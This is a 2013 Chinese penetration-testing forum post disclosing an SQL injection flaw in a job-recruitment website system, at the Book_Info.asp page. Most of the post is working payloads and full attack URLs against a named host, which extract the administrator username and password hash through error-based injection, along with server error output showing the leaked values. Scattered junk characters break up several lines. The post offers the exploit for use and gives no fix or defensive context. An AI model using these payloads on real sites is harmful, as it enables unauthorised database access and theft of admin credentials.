中国网络渗透测试联盟

标题: 网络求职招聘人才网站系统正式版漏洞 [打印本页]

作者: admin    时间: 2013-2-13 23:56
标题: 网络求职招聘人才网站系统正式版漏洞
漏洞出现在Educate/Book_Info.asp
  Z6 }: U, Y9 N5 q* y此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
! v  ?, c5 G& H* X/ ~1 L$ ^) T% K& yexp:如下9 }) x& F7 a$ ~" X
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)) ^' l3 l: H& W
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)  t! D& H' _$ ]. @& |7 P
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
5 I2 M2 V4 r- u( fMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
" m4 O; O" X/ U1 Y/ {将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
' R) h& `# u$ K1 F! Z7 E/Educate/Book_Info.asp,行 86 M7 R$ N0 }7 Z% [" q  D
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
3 \7 }4 I! H2 S& w& UMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'- c, i0 W/ Z- N! ]
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。9 g" M3 x# V4 ~4 \/ _
/Educate/Book_Info.asp,行 8




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2